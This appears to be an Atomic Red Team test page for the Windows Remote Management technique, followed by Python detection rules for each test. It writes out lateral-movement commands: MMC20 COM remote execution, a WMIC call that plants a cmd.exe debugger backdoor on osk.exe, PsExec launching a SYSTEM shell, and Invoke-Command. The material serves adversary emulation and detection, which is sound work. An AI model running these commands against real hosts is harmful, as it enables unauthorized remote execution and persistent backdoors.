T1028 - Windows Remote Management

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

Atomic Tests


Atomic Test #1 - Enable Windows Remote Management

Enable WinRM with PowerShell

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Enable-PSRemoting -Force


Atomic Test #2 - PowerShell Lateral Movement

PowerShell lateral movement using the MMC20.Application COM object

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1 |

Attack Commands: Run with command_prompt!

powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")


Atomic Test #3 - WMIC Process Call Create

Use WMIC to start a remote process

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |

Attack Commands: Run with command_prompt!

wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"


Atomic Test #4 - Psexec

Use psexec to start a remote process

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |

Attack Commands: Run with command_prompt!

psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe


Atomic Test #5 - Invoke-Command

Execute Invoke-Command on a remote host

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | Test |
| remote_command | Command to execute on remote Host | String | ipconfig |

Attack Commands: Run with powershell!

invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
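
A defender's counterpart to the five tests above, as an added example that is not part of the original page: command-line detection rules that flag each test's remote form while ignoring local use of the same tools. The rule names, host names and sample command lines are constructed, and the input is assumed to be process command-line telemetry (for example process-creation auditing with command lines enabled).

```python
import re

# One case-insensitive pattern per atomic test on this page (names are hypothetical).
RULES = {
    "test1_enable_psremoting": re.compile(r"\benable-psremoting\b", re.I),
    # Two-argument GetTypeFromProgID = COM object created on a remote host.
    "test2_mmc20_remote_com": re.compile(
        r"""gettypefromprogid\(\s*["']?mmc20\.application["']?\s*,""", re.I),
    # /node: makes wmic act on another machine; local use omits it.
    "test3_wmic_remote_create": re.compile(
        r"\bwmic(\.exe)?\b.*?/node:\S+.*?\bprocess\s+call\s+create\b", re.I),
    # A \\host argument distinguishes remote psexec from local use.
    "test4_psexec_remote": re.compile(
        r"\bpsexec(64)?(\.exe)?\b.*?\s\\\\[^\s\\]+", re.I),
    # -ComputerName (alias -Cn); abbreviated prefixes are not covered.
    "test5_invoke_command_remote": re.compile(
        r"\binvoke-command\b.*?\s-(computername|cn)\b", re.I),
}

def classify(command_line):
    """Return the sorted names of all rules matching one command line."""
    return sorted(n for n, rx in RULES.items() if rx.search(command_line))

def scan(events):
    """Return (host, rule) for every rule hit in (host, command_line) events."""
    return [(host, rule) for host, cmd in events for rule in classify(cmd)]

# Constructed sample telemetry: (reporting host, process command line).
SAMPLE_EVENTS = [
    ("WS01", r"powershell.exe Enable-PSRemoting -Force"),
    ("WS01", r'powershell.exe [activator]::CreateInstance([type]::'
             r'GetTypeFromProgID("MMC20.application","computer1"))'),
    ("WS02", r'wmic /user:DOMAIN\Administrator /password:x /node:Target '
             r'process call create "notepad.exe"'),
    ("WS02", r"psexec \\Target -u DOMAIN\Administrator -p x -s cmd.exe"),
    ("WS03", r"powershell.exe invoke-command -ComputerName Test "
             r"-scriptblock {ipconfig}"),
    # Benign local use that must not alert.
    ("WS04", r"wmic process list brief"),
    ("WS04", r"psexec -accepteula -s cmd.exe"),
    ("WS04", r"powershell.exe Invoke-Command -ScriptBlock {ipconfig}"),
    ("WS04", r'powershell.exe [type]::GetTypeFromProgID("MMC20.application")'),
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Running the atomic tests against a lab host and feeding the resulting process events through `scan` is a quick way to confirm that command-line logging is actually capturing what these rules need.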